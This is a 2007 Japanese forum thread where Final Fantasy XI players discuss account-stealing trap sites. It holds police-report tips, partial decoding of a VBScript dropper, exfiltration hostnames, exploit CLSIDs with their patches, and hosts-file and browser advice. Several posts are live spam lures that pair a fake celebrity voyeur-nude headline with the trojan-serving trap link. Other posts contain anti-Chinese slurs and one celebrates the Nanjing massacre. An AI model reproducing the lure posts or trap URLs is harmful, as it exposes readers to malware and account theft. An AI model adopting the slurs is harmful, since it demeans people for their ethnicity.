そういえば消費者センターにも連絡は後にしてくれって言われたな
とりあえず通報方法を確認してくる
605 :既にその名前は使われています:2007/10/17(水) 22:20:09.83 ID:oQ4IPfPj
>>553
ワラタ
ネ実民かっこよすぎ。
606 :既にその名前は使われています:2007/10/17(水) 22:41:32.59 ID:gxfNrmyX
注意喚起age
607 :既にその名前は使われています:2007/10/17(水) 22:49:23.03 ID:LWZuNVoi
うちのブログここ1〜2週間で幾つも罠サイト張られてるや・・・
最近手が込んで来て、フレの名前や、リンクしてもらってる知り合いのブログの
紹介文使って罠サイトに誘導しようとしてくるように。名前使うのはさすがにダメじゃろが(´Д`)
608 :既にその名前は使われています:2007/10/17(水) 22:53:23.06 ID:ENOfvqMv
>>559
オレも一ヶ月ほど前、アカウント抜かれたアホなんだが
既に警察には被害届けを出した。
不正アクセス防止法に禁止事項としてあげられている「なりすまし」によって
スクエニによって自分だけに認められている「使用権」を侵害されたってことでね。
ちゃんと受理されたぞ。
オレの場合は、警察への連絡が先だったせいかもしれないが
スクエニの社内調査の結果は、サポセンに電話した翌日にもらえた。
内容は「不正アクセスの痕跡は認められたが、断定にはいたらなかった」だそうだ。
609 :既にその名前は使われています:2007/10/17(水) 22:54:03.21 ID:vWfcBJ7K
未使用のPOLレジコあるけど、これで何か遊べないかな
610 :既にその名前は使われています:2007/10/17(水) 22:56:12.71 ID:hYLg4frY
おまえら逆に天才ハカーに頼んで反撃しろよ
611 :559:2007/10/17(水) 22:59:14.18 ID:fqbOSFiF
>>608
断定には至らないとかさすが■クオリティだな…
警察に届け出る時に「ゲームの内容がわかるものを持って来い」と言われたんだが
何を持ってったか教えてくれ。パッケージでいいのかな?
しかしそんな結果が実際に出てるとなると、こっちの課金の行方も知れてるな
とにかくちゃんと警察に届け出してみるよ
612 :既にその名前は使われています:2007/10/17(水) 23:14:56.10 ID:ENOfvqMv
>>611
もっていったもの
・スクエニの会社情報 HPのプリントアウトしたもの
・プレイオンラインサポセンの電話番号
受け答えしてくれたサポセンの人の名前も伝えるといいかも
警察で聞かれたもの
・プレイオンラインのIDとパスワード
・キャラ名
・犯行時間帯
・被害内容(なくなったゲーム内通貨・アイテム)
・プロバイダ
613 :既にその名前は使われています:2007/10/17(水) 23:16:41.30 ID:ZhFcz97x
安田美沙子スパ施設で全裸盗撮
ついに撮られてしまったか???安田美沙子チャンがスパ施設での入浴中に盗撮されてし
どう見ても本人としか思えないほど顔も体も鮮明に映し出されている↓
http://wannabe.fam.cx/service/link.cgi?http://www.k5dionne.com/ffzuotu.jpg
;
614 :既にその名前は使われています:2007/10/17(水) 23:16:57.27 ID:MYhrz13q
中国が国営セカンドライフ始めるのか。テラバロスww
615 :559:2007/10/17(水) 23:19:32.64 ID:fqbOSFiF
613は罠だぞー
>>612
ありがとう、参考にする
616 :既にその名前は使われています:2007/10/17(水) 23:19:50.85 ID:tpNTwn57
>>613
これ罠サイトね。IDごとあぼーん推奨。
617 :既にその名前は使われています:2007/10/17(水) 23:21:23.72 ID:lurGwrgn
Chink必死w
618 :既にその名前は使われています:2007/10/17(水) 23:22:38.31 ID:ENOfvqMv
しかし警察や消費者センターに連絡するな ってのは恐れ入るな
隠蔽しようとしているとしか思えんw
オレもサポセンとのやりとりで、スクエニが不正アクセスを受けているのだから、スクエニとして被害届けをださないのか聞いてみたところ
「弊社に直接的な被害がないし、被害届けを出す必要がない」と明言されたw
てめーらがパス抜かれようが、アイテムもっていかれようがしったこっちゃねーっってさw
明日にでもサポセンに社内調査結果の催促と、これ以上待たせるようだったら自分独自で動く旨を伝えてから
堂々と警察にいくのがよろしいかと思う。
619 :既にその名前は使われています:2007/10/17(水) 23:32:58.70 ID:lurGwrgn
支那畜は畑だけ耕して、食えなくなったらそのまま死ぬべきなのに。
先進国の人間に安価で使って捨てられる為に生まれた人種なんだから、
別に無理して生き長らえなくてもいいすよw
620 :既にその名前は使われています:2007/10/17(水) 23:33:20.47 ID:zJQm1fwD
フェローのクエ調べにサイトいったら移転してて、こんなコメントが
ほんといい加減にし欲しいよ中国・・・
WIKIの改ざんが一度行われた後、コンテンツを移転しコンテンツが無くなったWIKIを
バックアップから復元し、更に悪質なリンクを貼るという行動を予測せずそのままの状態で
WIKIを閉鎖しなかったのは完全に私の不手際でした。
被害を受けた方には大変ご迷惑をお掛けしました。
警察や消費者センターへの被害届も多くなれば■も重い腰あげてくれるかもしれませんし(あげざるを得なくなる?)
率先して堂々と被害届の提出を!被害者なんですから><
621 :既にその名前は使われています:2007/10/18(木) 00:10:46.11 ID:VASDUOIB
613の罠リンクをたどっていったらsanro.exeというファイルが見つかった。
ROのアカウントハックプログラムみたい。
Ragexe.exeとかRagurdrexe.exeを監視してて、ゲームサーバ
(211.13.228.19〜23、61.215.117.33〜38)との通信をキャプチャするっぽい。
ROって通信の暗号化してないのかな。FFはしていると聞くけど。
622 :既にその名前は使われています:2007/10/18(木) 00:21:18.35 ID:upu+hecg
被害者少なくするためにもオフィシャルで犯罪手口だの回避方法大々的に紹介して
inしたら/tell音つきで注意喚起のシステムメッセ流すんだ!■e!
623 :既にその名前は使われています:2007/10/18(木) 00:27:53.72 ID:GYj5KYHi
ローカルとのログイン時間が合わない時くらい
大々的に警告出しても良いんじゃないか?
毎回別のPCでプレイするなんて人なかなかいないだろうし
624 :既にその名前は使われています:2007/10/18(木) 00:28:37.36 ID:qySzjoI7
■eが重い腰を上げるとどうなるの?
不正アクセスや罠リンクが消えるの?
てかよく知らないんだけどFFの運営って
他のMMOに比べてセキュリティ面で劣ってるの?
625 :既にその名前は使われています:2007/10/18(木) 00:33:49.50 ID:VfGQItA4
>>621
あれ?俺は613を解析したら sanf11.exe を取りにいくようになってたよ?
難読化も解除してソースを確認したから間違い無いと思うんだけど・・・
なんか別の仕組みがあるんかな?
それと解析してて気づいたんだけど
"www■k5dionne■com" と "www■6828teacup■com" は、両方とも同じIPアドレスなんだよね
(61.139.126.2)
フィルタしている人は nslookup して、IPアドレスで制限した方がいいかもね
626 :既にその名前は使われています:2007/10/18(木) 00:37:34.70 ID:GYj5KYHi
>>624
リネ2なんかだと
セキュリティカードが発行される(画像で)
完全に安全になるかどうかは知らんがね
627 :既にその名前は使われています:2007/10/18(木) 00:40:27.09 ID:upu+hecg
パス抜き行為が減るわけないだろうけどネ実でスレ立てまくるより
オフィシャルで大きくやってもらったほうが、ユーザーの危機意識がより大きくなるんじゃね?
と思った次第であります。
628 :既にその名前は使われています:2007/10/18(木) 00:53:50.64 ID:aH12nX3Y
>>583
遅レス
そうなら窓化なんてツールは流行らない
629 :既にその名前は使われています:2007/10/18(木) 00:58:19.92 ID:RqqtxN79
>>583
>オレはウィルスでもなんでもokなパソコンで見てるけどなぁ
いやそのPCも最低限のセキュリティ対策してくれな
解ってるとは思うけど。
見知らぬ第3者に迷惑をかけてるってこともあるしさ
例えばこの同じ2chのanime2サーバとか
630 :既にその名前は使われています:2007/10/18(木) 00:58:26.74 ID:5Bmnl1Rc
流行ってるとは初耳だがw
631 :既にその名前は使われています:2007/10/18(木) 01:06:15.16 ID:F5sxsEh2
>>630
開発が窓化を可能にするか検討を始めるくらいには
要望が出ているようだが
632 :既にその名前は使われています:2007/10/18(木) 02:28:37.49 ID:VASDUOIB
>>625 ごめん、酒飲みにいってたw
さらにごめん。違うディレクトリをのぞいてたw
上で教えてもらったように0x7fでandとったらVBScriptでてきました。
おっしゃるとおり、FFXIをターゲットにしたsanf11.exeを取りに行ってますな。
>496-497のやつ。
hostsでff11ma.vicp.netを127.0.0.1にしてしまえばアカウントデータの
送信を阻止できそうだと別スレで書いたんだけど、今現在、このホストは
名前解決できないんだよね。
トロイをばらまいておいてから復活させるつもりなのかなあ。
633 :既にその名前は使われています:2007/10/18(木) 02:45:04.38 ID:zD2/FQ6P
>>613
これ踏んだら具体的にどうなるの?
教えてエロイ人!
634 :572:2007/10/18(木) 02:49:33.94 ID:3PTwfdxc
>>590
自動ログインはオンですし、
パスワードも保存にしていますが、
ゲーム終了して、
またログインしようとすると解除されていてパスも消えています。
635 :既にその名前は使われています:2007/10/18(木) 02:50:05.75 ID:9y5akCo+
>>633
WindowsやIEのセキュリティアップデートを適用していないPCで踏むと
POLのアカウントが上海あたりの業者に送信されて、気づいたときには
アルテパゲートの先に放置された素っ裸のマイキャラが見つかる。
636 :既にその名前は使われています:2007/10/18(木) 02:50:56.53 ID:F5sxsEh2
>>604
遅レスだが
昔警察庁関係の知人から言われた話
ネット関連の被害の話を警察の専門
部門にして、そこでリアルマネーの
被害の話をしたからって警察の
リアルマネー関連の被害を扱う部署に
伝わると思うなだそうな。
(逆も当然言える。どうもかなり
縦割りな所が多いらしい)
現金がらみの被害の話は不正アクセスとは
別の所にもしておく事をお勧めする。
637 :既にその名前は使われています:2007/10/18(木) 02:51:52.62 ID:GYj5KYHi
>>635
河川敷で発見された盗難車みたいだな
638 :既にその名前は使われています:2007/10/18(木) 02:53:48.64 ID:/L4F3ZpT
>>635
これ少し前かな?罠サイトの話し出る前に踏んじゃったよ・・・・・。
箱ユーザーだけどやばいかな?
639 :既にその名前は使われています:2007/10/18(木) 02:54:17.15 ID:zD2/FQ6P
>>635
ヒィィィィィィィ((((゜Д゜;))))
うちはアップデートしてるから一応大丈夫か。
640 :既にその名前は使われています:2007/10/18(木) 02:57:11.01 ID:DmMQM0oe
vicp.netって 2〜3年前からスパムメール+バックドアトロイで有名なとこじゃね?
んで ダイナミックDNSのサブドメだった気がする。
641 :既にその名前は使われています:2007/10/18(木) 03:00:34.91 ID:9y5akCo+
>>638
箱はCPUのアーキテクチャが違うから、箱でこれを踏んでも大丈夫だと思う。
いわゆるWindows PCで踏んだなら、しばらくはこまめにウイルスチェックしたほうがいい。
POL垢だけを狙うとは限らないから。
今後、箱を標的にしたトロイが出てくる可能性もあるけどペイしないだろうな。
642 :既にその名前は使われています:2007/10/18(木) 03:02:10.61 ID:/L4F3ZpT
>>641
ありがとう。
さっきウィルススキャンしたら変なファイル出てきたから様子見とく
643 :既にその名前は使われています:2007/10/18(木) 03:03:21.10 ID:VASDUOIB
>>640
ググってみたけら、その通りみたい。spamメール方面では有名らしい。
ダイナミックDNSホストだといつ復活してもおかしくないから要注意だね。
644 :既にその名前は使われています:2007/10/18(木) 03:51:24.02 ID:axIBolba
すみませんが、質問させてください。
1.真っ白なページが表示されただけでもパスが抜かれたと考えてよいのか
(リンク先を表示した時点で、ノートンアンチウィルスが働いたのを確認しました)
2.それともサイト内をクリック、またはダウンロード等の動作を行うでパスを解析されるのか
3.こういうサイトは1で働いたようなノートンアンチウィルスのブロックで対応出来るのか
状況としましては、知人のブログにてリンクをクリックしたところ、
画面に何も無い真っ白なページへと飛ばされました。
すぐ管理人(知人)本人に連絡したところ、怪しいということからリンクを
消去しようとしていた模様。運悪く書き込みの直後、管理人の確認・消去の
対応以前に私が飛んでしまったようです。
書き込みはブログのコメント欄に、「FF11○○日記管理人です。
ブログにリンクさせてもらいました。」といったもの。
(コメント内容にあるブログは有名なところで実在しています。)
なにぶん慌ててしまい、状況説明もままならず申し訳ありません。
こちらの不注意とも理解しておりまますが、回答をいただければと思います。
645 :既にその名前は使われています:2007/10/18(木) 03:57:58.52 ID:d9C9cdWT
怪しいの踏んだらとりあえず回線抜いてウイルス検索しなさい
646 :既にその名前は使われています:2007/10/18(木) 04:06:21.23 ID:blyQ1ZSX
ブラウザまたはOSの脆弱性を突かれた場合にはユーザ操作は要求されずに開いた時点でアウト
1ページに複数仕込まれている場合もあるので対ウィルスソフトが反応したとしても漏れている可能性がある
647 :既にその名前は使われています:2007/10/18(木) 04:08:28.48 ID:R3+z4YvF
Winのアップデートを最新までしとけばセフセフだっけ?
648 :既にその名前は使われています:2007/10/18(木) 05:41:10.00 ID:10hr0Zus
>>646
ブラウザ関係の穴をつかれると、アプリケーション毎に
ネットへアクセス可・不可やアクセスポートやプロトコルを
管理しているノートン系のファイアーウォールも反応しない
だろうしな。
俺は今まで2ch系はARMなcpuのマシンでアクセスして
居たんで安心して居たんだが、一般のBLOGや情報系のwikiに
までリンクを貼られて居ちゃ安心出来ないな
(当然メインマシンはウィンドウズアップデートはして
居るし、通常使用するウェブブラウザも一番狙われる
IEは避けて居る)
bot監視系のツールも入れて見るか。
649 :既にその名前は使われています:2007/10/18(木) 06:56:57.02 ID:zD2/FQ6P
sanffmを暗算でand 0x7fしてみた
ところどころ間違ってるかもしれん
VBscriptに詳しい人あとは頼む
ttp://sakuratan.ddo.jp/uploader/source/date55023.zip
650 :既にその名前は使われています:2007/10/18(木) 08:07:58.32 ID:v41q9n4R
>>649
うは本当にvbsだw
俺も詳しくは無いけど確かにvbsとexeファイルを
落として実行してるね。
でもこれローカルのvbsなら兎も角ネット上では
規制が入って居る機能を使って居るけど、
そこを通してしまうバグがIEに有ったって事か。
取り敢えず上の方で色々言われて居る事に+αで
IEはヤメトケってのを追加しておく。
しかしjsで無く何でvbsなのかねーvbsなhtmlなんぞ
IE以外じゃ真っ当に動かないのに。
651 :既にその名前は使われています:2007/10/18(木) 08:46:46.29 ID:CfiB5gUC
mixiでも知らない人からサイト紹介コメントが書き込まれる事がある模様。
まかーなんで詳細は分からないけど、怪しいXMLファイルとcurファイルを実行しようとしてた。
652 :既にその名前は使われています:2007/10/18(木) 08:51:55.92 ID:CfiB5gUC
紹介されたサイトは、iframeで以下のURLが埋め込まれていた。
http://wannabe.fam.cx/service/link.cgi?http://www●yyjjoopp●com/main.htm
URL削ると中華サイト
653 :既にその名前は使われています:2007/10/18(木) 09:01:58.32 ID:CfiB5gUC
検索したら既に書き込みあったわー恥ずかしい。
以下の書き込みに注意。
・・・(・ω・)。 2007年10月18日 00:46
あるある(′ω`)
ドロップするしないはトレハンで頑張れるんですが、
種類は特定できないので涙目w
ExRareで足装束交換券っぽいのドロップで
ナイズル受付のガルカが装備品に交換とかでいいのにNE!?(*'ω')?
http://wannabe.fam.cx/service/link.cgi?http://ff11link●blog122●fc2.com/
654 :既にその名前は使われています:2007/10/18(木) 09:11:53.03 ID:VqURJ+Uz
ぷれみあwサイトや はてな はまだ安全なのか?
655 :既にその名前は使われています:2007/10/18(木) 09:43:57.97 ID:zD2/FQ6P
とりあえず一連の罠URLはMS06-014のパッチ当てとけば
リモートで実行されることは無いっぽいのかな。
FFスクリーンセーバーとかなんとか適当な嘘言って実行ファイル配布して
ユーザー自身に実行させてきたら危ないかもしれんが。
656 :既にその名前は使われています:2007/10/18(木) 09:45:31.31 ID:Bg/qhuA3
>>653
mixiで最近よくそのURLみるなぁ・・・
657 :既にその名前は使われています:2007/10/18(木) 09:56:19.65 ID:JoiyR3Ic
>>649 のVBscriptのソースは 『"&"』 を消すと更に解りやすくなるね
(特定単語を "&" で分割してAntiVirus系ソフトのパターンマッチングに引っかからないようにしてるね
でも、こんなんですり抜けちゃうAntiVirusソフトは使わない方がいいねぇ(汗))
658 :既にその名前は使われています:2007/10/18(木) 10:26:55.35 ID:grRU0oPa
パターンマッチングは元々すぐに重くなる傾向を持った処理だから
いたちごっこが進むにつれてどんどんアンチvirus ソフトが重くなる
MS<いいこと思いついた、
わざと脆弱性を入れる>virus作られる
>AntiVソフトが対応する>AntiVソフトが重くなる
>もっさりを嫌って新しいハードが売れる>OEMライセンスが売れる
冗談だけど、MSならやりかねない
659 :既にその名前は使われています:2007/10/18(木) 10:33:49.74 ID:/L4F3ZpT
ついにスレを立て始めました
http://wannabe.fam.cx/service/link.cgi?http://live25.2ch.net/test/read.cgi/ogame/1192670699/
660 :既にその名前は使われています:2007/10/18(木) 10:36:30.34 ID:JoiyR3Ic
>>655
自分は今のところ、大きくわけて3種の攻撃パターンは確認しました
その3種はそれぞれ 「MS01-017適用、MS06-014適用、BaoFeng Storm未使用」 で防げると思う。(つまり Windows Up
Date してればOK)
BaoFeng Stormの脆弱性を利用するのは無視して構わないと思う(中国のツールでインターフェースも中国語)
(1) 『*.cur』が含まれている奴
・MS01-017(KB925902) GDI の脆弱性により、リモートでコードが実行される
ttp://www.microsoft.com/japan/technet/security/bulletin/ms07-017.mspx
・MS07-017(KB935423) Windows アニメーション カーソル処理の脆弱性
ttp://www.microsoft.com/japan/technet/security/advisory/935423.mspx
(2) 『CL*S*ID:B*D96*C5*56-65*A3-11*D0-98*3A-00*C04*FC29*E36』
が含まれている奴 ("*"は無視してください)
・MS06-014(KB911562) Microsoft Data Access Components (MDAC) の機能の脆弱性により、コードが実行される可能性がある
ttp://www.microsoft.com/japan/technet/security/Bulletin/MS06-014.mspx
(3) CL*S*ID:6*BE*52*E1*D-E5*86-47*4f-A6*E2-1A*85*A9*B4*D9*FB
が含まれている奴 ("*"は無視してください)
・BaoFeng Storm がインストールされていなければOK(MPS.dllがなければOK?) (パッチが出ていない模様)
※ BaoFeng Storm(www■baofeng■com):中国のメディアプレイヤーみたいなツール?日本人は無視してよさげ?
661 :既にその名前は使われています:2007/10/18(木) 11:22:29.37 ID:corEsIh+
>>653
mixiやってるから、そいつのページとんだけど自己紹介のところに、「3度目の登録」とか書いてたなぁ。
そいつのマイミクはよくわからん普通の女ばっかだったけど。
ちなみにaguse.netで検索したらラスベガスにサーバーあったけど。
662 :既にその名前は使われています:2007/10/18(木) 11:30:45.38 ID:lfHUbr/0
愛してやまないマイキャラが裸で流砂洞に立たされてる所を想像したら
涙が出てきた。
663 :既にその名前は使われています:2007/10/18(木) 11:49:42.77 ID:6nG2vYxo
MMOやってる。同じPCでネットも見る。
なら最初にすべきことでかつかなりいい防御策は
OperaかFxをダウンロードしてインスコすることだ。
ttp://jp.opera.com/
ttp://www.mozilla-japan.org/products/firefox/
これを機会に一考してくれ>IE使ってるやつ。
664 :既にその名前は使われています:2007/10/18(木) 12:01:28.12 ID:K2oyKY1H
>>663
そっち方面ド素人なんだけど、いろいろ設定なんかめんどうがないのはどっち?
危機感あるんですぐにも乗り換えたい
665 :既にその名前は使われています:2007/10/18(木) 12:03:18.03 ID:fn5xS4Gh
>>664
個人的にはOperaお勧めだけど
たまにOperaじゃ見れないページがあるヴァーン
666 :既にその名前は使われています:2007/10/18(木) 12:09:42.78 ID:qJk5V3Uo
ブラウザはFirefox、メーラーはThunderbird推奨って
勤務先では言われたなw
667 :664:2007/10/18(木) 12:15:35.02 ID:K2oyKY1H
レスありがとう。
同じPCでネットもメールもゲームもやってんのよ。
一応UPは自動でやってて、ノートン先生とniftyの24時間なんとかってセキュリティ両方はいってる。
スパイポッドだっけか、あれも入ってる。
スパイウェアは毎日、ウィルスは週一で動かしてる。
ブラウザがIEでメーラーがOEだからなぁ。これを両方替えると少し安心できるか。
張ってくれた両方とも眺めてみる
ネスケっていう選択肢はなしかな?以前4.73までは使ってたが
上で書いてる人いたけど、自分の愛するキャラがぽつんとどこかで裸になってる図なんて想像すらしたくないよ
668 :既にその名前は使われています:2007/10/18(木) 12:16:58.82 ID:+sSwl6dg
>>653
こんな感じのを踏んだことがあって何も表示されてない
真っ白なページに飛んだんだけど何が起こるのかな。
spybotでスキャンしたけど何もでてこなかった。
詳しい方教えてください
669 :既にその名前は使われています:2007/10/18(木) 12:17:53.73 ID:6nG2vYxo
せっかくだしどっちとも落として試すといいかも。
個人的意見を言うならFx。
ダウンロードしたまんまだと、タブブラウザで、IEじゃない、程度の機能しか入ってない。
なので面倒は少ないかも知れない。
Fxの場合はます、オプション>コンテンツ>フォントと配色、で
規定のフォントをMSPゴシック(かIEで使ってたフォント)、サイズを12にする。
たしか明朝体になってるはず。最初。
タブ>新しいページは次の場所に開く、を
新しいタブで開く、に。
その上の「Javaを有効にする」のチェックは外しておく。
「JavaScriptを有効にする」の方はまあお好みで。
670 :既にその名前は使われています:2007/10/18(木) 12:29:41.10 ID:grRU0oPa
>666
さらに徹底して、Winマシンではメールを使わないって人もいたり
671 :既にその名前は使われています:2007/10/18(木) 12:41:20.32 ID:6nG2vYxo
>667
ttp://browser.netscape.com/
ネスケはこないだ9が出た。
まあ、中身はFirefoxだけど(Firefox2をベースに作ってある)。
672 :既にその名前は使われています:2007/10/18(木) 13:54:56.88 ID:40Xio/no
飛ぶ前の基本
その1.ソースチェッカー
ttp://so.7walker.net/guide.php
その2.ホストファイル変更
c:\windows\system32\drivers\etc にあるhostsをメモ帳で開く
ttp://lineage.nyx.bne.jp/misc/security/id_url-site.html にある危険サイト一覧から
#Trojan trap sites以降をコピーし、hostファイルに貼り付け上書き保存する
その3.ブラウザの設定
InternetExplorer使用者はメニューの ツール→オプション→セキュリティ を開きセキュリティの
レベルを【高】にする
ttp://www.mozilla-japan.org/products/firefox/ からfirefox2をインストールしIEを捨て去る
その4.その他
WindowsUpdateを心かげる
ウィルススキャンソフトを導入し、最新のデータが導入されるようにする
PeerGuardian2を導入し中国を遮断する
673 :既にその名前は使われています:2007/10/18(木) 14:27:42.47 ID:iywBXTS8
ブログ主さんは基本自分とこに謎コメント来るまで注意書きださない所が多いなあ。
どうしたもんか。
674 :既にその名前は使われています:2007/10/18(木) 14:51:01.10 ID:vjwWwdSJ
注意を促すのは義務ではないし、やっぱ自分のところにも来ないと危機意識は薄いんだろう
ブログ書くだけで他のサイト見てないのなら知らないってこともありうる
■eが公式とPOL内のニュースで詳しく告知してくれるのが手っ取り早いんだが
上の被害報告見てると関知したくないのが見え見えだからな・・
もっと被害者の声が大きくなれば対応は変わるんだろうが
ネトゲのアイテムだからなー騒ぐまでもなく諦める人も多そうだ
675 :既にその名前は使われています:2007/10/18(木) 15:09:40.38 ID:Wl5xpTxb
>>654
ぷれみあwではようやく昨日にこの注意文が載ったみたいだ。
>【重要】悪質なサイトへのリンクに注意してください 2007/10/17
>当サイトのフォーラムへも度々投稿されているので,見かけている方も居ると思いますが,
悪質なサイトへのリンクを含む内容の投稿が多くのサイトで確認されています。
当サイトでも,投稿が発見された時点で即時削除を行っている状況です。
>このような悪質なサイトでは,FFXIを含むネットワークゲームのアカウントだけではなく,
そのほか多くの個人情報を違法に盗まれてしまうスパイウェアに感染する可能性があります。
その多くは,空白のページが表示されたり,アダルトサイトに偽装していたりと,
一見しただけでは気付きにくいことから被害が拡大していますので注意してください。
問題はあっちの住人がこの問題にほとんど興味を示していないとこだろう。
676 :既にその名前は使われています:2007/10/18(木) 15:50:21.20 ID:PAo8gd2X
こういうスレこそ下げずに上げておくべきだと思うんだ
677 :既にその名前は使われています:2007/10/18(木) 15:52:43.57 ID:+Qc68jnB
俺もこの事を自分のブログで広めようとおもうをだが、誰かテンプレつくってくれないか?
678 :既にその名前は使われています:2007/10/18(木) 15:56:42.00 ID:B8b95TmU
火狐を使い始めるとIEは使わなくなるな。
679 :既にその名前は使われています:2007/10/18(木) 16:00:27.07 ID:MYd6Eh0f
>>673
コメント来てないけど一応注意書き書いたぜ!
中華どころか一般プレイヤーのコメントすらないがなhahahahaha
680 :既にその名前は使われています:2007/10/18(木) 16:00:53.55 ID:fn5xS4Gh
>>679
hahaha
お前は俺か
681 :既にその名前は使われています:2007/10/18(木) 16:13:07.63 ID:iywBXTS8
>>679-680
一緒に飲まないか
682 :既にその名前は使われています:2007/10/18(木) 16:15:59.02 ID:N2TYZHkD
>>477
今携帯なんで探れないけど
レス番400前後ぐらいに注意を書いたサイト作ってくれてた人がいたよ
683 :既にその名前は使われています:2007/10/18(木) 16:29:02.02 ID:iywBXTS8
>>452かな?
サイト作るなら好きに持ってってくれってやつ。
684 :既にその名前は使われています:2007/10/18(木) 16:36:07.94 ID:fiBTDuKj
>>677
きっと
セキュリティの事をもっと勉強するはこのサイトがお勧めです
http://wannabe.fam.cx/service/link.cgi?http://www.wanasaito.com/akaunntoitadaki/
みたいなコメントが付くなw
685 :既にその名前は使われています:2007/10/18(木) 16:37:06.79 ID:vjwWwdSJ
テンプレコピペもいいが時間が許すなら
テンプレサイトたちを参考するなりして記事にするのもいいと思うよ
自分で調べながら記事にすることでFFに限らずネットへの知識が増えるし
それだけで自分のブログの記事更新した気分になれる
686 :既にその名前は使われています:2007/10/18(木) 16:38:51.45 ID:Bms8mGgx
支那畜死ね
687 :既にその名前は使われています:2007/10/18(木) 16:53:42.69 ID:fF7+81ED
すみません、いつも金曜日になると昼ごろPCからガリガリ音が鳴って
インターネットが遅くなるんですけど、これってスパイウェアですか?
FFやってると突然そうなるのでパスワードとか盗まれてそうで心配です・・・(+_+)。
688 :既にその名前は使われています:2007/10/18(木) 16:56:01.17 ID:uFbDc/3d
前世紀からのOpera使いだが、軽くて気に入ってる
あと、ショートカットとマウスジェスチャーが当時から充実してたな〜
これ使ったら最後IEになんか戻れなくなって、Operaじゃ見られないページのために、Sleipnir入れたっけ
Operaだと行間詰まるから、それ回避やってるけど、Ver9もそのまま?
メーラーは鶴亀最強wと個人的に思ってる
全部テキストになるから、何も動かんw
689 :既にその名前は使われています:2007/10/18(木) 17:15:20.61 ID:REh2lIur
プニルなんだか重くなったな。
690 :既にその名前は使われています:2007/10/18(木) 17:20:31.38 ID:uFbDc/3d
プニルのロボフォームが好きくない
691 :既にその名前は使われています:2007/10/18(木) 17:43:00.14 ID:REh2lIur
>>690
ビービービー、エロイ萌ヘサイトダナホゾンスルカ?
692 :既にその名前は使われています:2007/10/18(木) 18:36:00.06 ID:PUNmnAkC
http://wannabe.fam.cx/service/link.cgi?http://jbbs.livedoor.jp/game/38862/
http://wannabe.fam.cx/service/link.cgi?http://jbbs.livedoor.jp/game/38862/
693 :既にその名前は使われています:2007/10/18(木) 18:41:19.28 ID:VqURJ+Uz
アドレスだけ張る奴は何がしたいのかわららん
シナ畜の仲間か?
694 :既にその名前は使われています:2007/10/18(木) 18:41:34.63 ID:4rwpWbym
定期あげ
695 :既にその名前は使われています:2007/10/18(木) 19:17:43.36 ID:30HwgILz
本当に増えてきたよなこの手の罠
知り合い5人のblogにもリンク張られてたわ
age
696 :既にその名前は使われています:2007/10/18(木) 19:32:02.28 ID:UWP3uCQB
安田美沙子スパ施設で全裸盗撮
ついに撮られてしまったか???安田美沙子チャンがスパ施設での入浴中に盗撮されてし
どう見ても本人としか思えないほど顔も体も鮮明に映し出されている↓
http://wannabe.fam.cx/service/link.cgi?http://www.k5dionne.com/ffzuotu.jpg
697 :既にその名前は使われています:2007/10/18(木) 19:33:06.95 ID:/L4F3ZpT
>>696
しね
698 :既にその名前は使われています:2007/10/18(木) 19:35:41.83 ID:OBJDeidY
安田ってwwwwww
旬すぎたババァじゃねーか
罠じゃなくても見ねーよ(^O^)
699 :既にその名前は使われています:2007/10/18(木) 20:11:46.20 ID:UWP3uCQB
安田美沙子スパ施設で全裸盗撮
ついに撮られてしまったか???安田美沙子チャンがスパ施設での入浴中に盗撮されてし
どう見ても本人としか思えないほど顔も体も鮮明に映し出されている↓
http://wannabe.fam.cx/service/link.cgi?http://www.k5dionne.com/ffzuotu.jpg
700 :既にその名前は使われています:2007/10/18(木) 20:17:42.80 ID:ZBy6mTmC
天安門必死杉ワロタw
701 :既にその名前は使われています:2007/10/18(木) 20:20:28.47 ID:5rCgRJfZ
cao ni ma ^^
702 :既にその名前は使われています:2007/10/18(木) 20:27:37.36 ID:vZ0/xsyM
台灣獨立万歳age
703 :既にその名前は使われています:2007/10/18(木) 20:52:04.38 ID:UWP3uCQB
安田美沙子スパ施設で全裸盗撮
ついに撮られてしまったか???安田美沙子チャンがスパ施設での入浴中に盗撮されてし
どう見ても本人としか思えないほど顔も体も鮮明に映し出されている↓
http://wannabe.fam.cx/service/link.cgi?http://www.k5dionne.com/ffzuotu.jpg
704 :既にその名前は使われています:2007/10/18(木) 20:53:13.35 ID:y52zr773
よく分からんが西蔵と書いておこう
705 :既にその名前は使われています:2007/10/18(木) 20:54:36.98 ID:W2D7YWwS
これ雑談スレにもはられていたような
706 :既にその名前は使われています:2007/10/18(木) 20:57:01.59 ID:xkV3GsES
南京で害虫駆除してくれた英雄のためにage
707 :既にその名前は使われています:2007/10/18(木) 21:02:51.83 ID:UWP3uCQB
安田美沙子スパ施設で全裸盗撮
ついに撮られてしまったか???安田美沙子チャンがスパ施設での入浴中に盗撮されてし
どう見ても本人としか思えないほど顔も体も鮮明に映し出されている↓
http://wannabe.fam.cx/service/link.cgi?http://www.k5dionne.com/ffzuotu.jpg
708 :既にその名前は使われています:2007/10/18(木) 21:04:06.48 ID:uVDXmWKm
コノヤロウ連投し始めたな。
709 :既にその名前は使われています:2007/10/18(木) 21:04:52.28 ID:/L4F3ZpT
俺らが天安門、天安門叫ぶから顔真っ赤なのかね?
710 :既にその名前は使われています:2007/10/18(木) 21:09:45.82 ID:NH8+rpZ0
>>707
cai ni ma
bu dai
711 :既にその名前は使われています:2007/10/18(木) 21:09:56.61 ID:y52zr773
逆に保守になってスレに貢献してくれてるな
712 :既にその名前は使われています:2007/10/18(木) 21:11:16.93 ID:8Pkcb3N8
>>709
なりふりかまわず攻撃できそうなところは攻撃しているっぽい。
DOS攻撃をしかけて運営を恐喝して金巻き上げるとか、
ゲーム運営会社だけではなくて韓国やアメリカの
アイテム仲介サイトまで標的にしている。
713 :既にその名前は使われています:2007/10/18(木) 21:18:17.05 ID:iywBXTS8
じゃとりあえず法輪功って書いとこう
714 :既にその名前は使われています:2007/10/18(木) 21:25:46.79 ID:UWP3uCQB
安田美沙子スパ施設で全裸盗撮
ついに撮られてしまったか???安田美沙子チャンがスパ施設での入浴中に盗撮されてし
どう見ても本人としか思えないほど顔も体も鮮明に映し出されている↓
http://wannabe.fam.cx/service/link.cgi?http://www.k5dionne.com/ffzuotu.jpg
安田美沙子スパ施設で全裸盗撮
ついに撮られてしまったか???安田美沙子チャンがスパ施設での入浴中に盗撮されてし
どう見ても本人としか思えないほど顔も体も鮮明に映し出されている↓
http://wannabe.fam.cx/service/link.cgi?http://www.k5dionne.com/ffzuotu.jpg
715 :既にその名前は使われています:2007/10/18(木) 21:26:15.20 ID:6nG2vYxo
